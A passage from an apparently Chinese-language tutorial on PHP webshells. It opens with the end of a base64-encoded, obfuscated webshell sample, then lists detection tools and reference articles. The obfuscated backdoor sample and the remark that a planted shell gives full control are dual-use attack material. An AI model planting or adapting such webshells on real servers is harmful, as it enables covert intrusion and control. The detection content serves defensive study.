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'\x29\x29\x29\x3B",".");
?>
9、加密
这里不再介绍了
五、种马之后
由于被入侵过,对之前的文件有过研究,截几张图大家看看
基本上就可以为所欲为了
六、检测工具
编号 | 名称 | 参考链接 |
---|---|---|
1 | 网站安全狗网马查杀 | http://download.safedog.cn/download/software/safedogwzApache.exe |
2 | D盾 Web查杀 | http://www.d99net.net/down/WebShellKill_V2.0.9.zip |
3 | 深信服WebShellKillerTool | http://edr.sangfor.com.cn/tool/WebShellKillerTool.zip |
4 | BugScaner killwebshell | http://tools.bugscaner.com/killwebshell/ |
5 | 河马专业版查杀Webshell | http://n.shellpub.com/ |
6 | OpenRASPWEBDIR+检测引擎 | https://scanner.baidu.com |
7 | 深度学习模型检测PHP Webshell | http://webshell.cdxy.me/ |
上面工具非常好用,95%的基本都能检测出来,知道webshell是什么样的,就可以根据相应的特征找出来
参考文档
https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
https://joychou.org/web/webshell.html
http://www.likesec.com/2017/12/08/webshell/
http://www.freebuf.com/articles/web/155891.html
http://www.freebuf.com/articles/web/9396.html
https://blog.csdn.net/xysoul/article/details/49791993
https://cloud.tencent.com/developer/article/1097506
http://www.91ri.org/12824.html
http://www.3years.cc/index.php/archives/18/
http://www.cnblogs.com/LittleHann/p/3522990.html
https://habrahabr.ru/post/215139/
https://stackoverflow.com/questions/14674834/php-convert-string-to-hex-and-hex-to-string
关于PHP中的webshell的更多相关文章
- kali中的webshell工具--webacoo
webacoo webshell其实就是放置在服务器上的一段代码 kali中生成webshell的工具 WeBaCoo(Web Backdoor Cookie) 特点及使用方法 类终端的shell 编 ...
- kali中的webshell
webacoo -g 生成一句话 -o 输出文件 -r 不混淆代码 -t 连接模式 -u 制定URL 生成一句话 webacoo -g -o a.php 连接一句话 webacoo -t -u htt ...
- Deformity ASP/ASPX Webshell、Webshell Hidden Learning
catalog . Active Server Page(ASP) . ASP.NET . ASP WEBSHELL变形方式 . ASPX WEBSHELL变形方式 . webshell中常见的编码转 ...
- 【服务器防护】WEB防护 - WEBSHELL攻击探测【转载】
原文:http://www.2cto.com/Article/201511/451757.html 1. 什么是webshell? 基于b/s架构的软件部署在Internet上,那么安全性是必 ...
- 利用“进程注入”实现无文件复活 WebShell
引子 上周末,一个好兄弟找我说一个很重要的目标shell丢了,这个shell之前是通过一个S2代码执行的漏洞拿到的,现在漏洞还在,不过web目录全部不可写,问我有没有办法搞个webshell继续做内网 ...
- 11. 几点基于Web日志的Webshell检测思路
摘要: Web日志记录了网站被访问的情况,在Web安全的应用中,Web日志常被用来进行攻击事件的回溯和取证.Webshell大多由网页脚本语言编写,常被入侵者用作对网站服务器操作的后门程序,网站被植入 ...
- webshell检测方法归纳
背景 webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB ...
- webshell学习
参考文章: https://www.bilibili.com/video/BV1T4411t7BW?p=14 https://blog.csdn.net/mmmsss987/article/detai ...
- 【原创】利用“进程注入”实现无文件不死webshell
引子 上周末,一个好兄弟找我说一个很重要的目标shell丢了,这个shell之前是通过一个S2代码执行的漏洞拿到的,现在漏洞还在,不过web目录全部不可写,问我有没有办法搞个webshell继续做内网 ...
随机推荐
- DOM编程艺术推荐的addLoadEvent和insertAfter
addLoadEvent.js function addLoadEvent(func){ var oldonLoad = window.onload; if(typeof window.onload! ...
- Zookeeper笔记(一)初识Zookeeper
为什么需要Zookeeper Zookeeper是一个典型的分布式数据一致性的解决方案,分布式应用程序可以基于它实现诸如数据发布/订阅.负载均衡.命名服务.分布式协调/通知.集群管理.Master选举 ...
- mybatis的sqlSessionFactory的加载过程
使用过SSM的框架的都知道mybatis这个持久层框架,今天小编就来简单说说这个框架的核心工厂类sqlSessionFactory的加载过程,一般的SSM框架我们都会在spring的applicati ...
- c# 服务安装后自动启动
switch (rs) { case 1: var path = @&q ...
- 通过工具SecureCRTPortable将项目部署到服务器上
1.将项目打包 2.打开工具连接指定的ip 下面是一些命令 tab键可以有一些提示功能 ls 查看服务器当前目录 lls 查看硬盘当前目录 其实就是linux系统命令 ,服务器是正常命令 ,操作本电 ...
- 《Android进阶之光》--事件总线
No1: EventBus三要素: 1)Event:事件 2)Subscriber:事件订阅者 3)Publisher:事件发布者 No2: EventBus的4种ThreadMode(线程模型): ...
- Java的split()用法
特殊情况有 * ^ : | . \ 一.单个符号作为分隔符 String address="上海\上海市|闵行区\吴中路"; String[] splitAddress=addr ...
- 潭州课堂25班:Ph201805201 爬虫基础 第十一课 点触验证码 (课堂笔记)
打开 网易盾 http://dun.163.com/trial/picture-click ——在线体验——图中点选 打码平台 ——超级鹰 http://www.chaojiying.com/ ...
- bootStrap中的ul导航2
<!doctype html><html > <head> <meta charset="utf-8"> <link rel= ...
- HTML5开发学习:本地存储Web Sql Database
Web Sql Database,中文翻译作"本地数据库",是随着HTML5规范加入的在浏览器端运行的轻量级数据库. 在HTML5中,大大丰富了客户端本地可以存储的内容 ...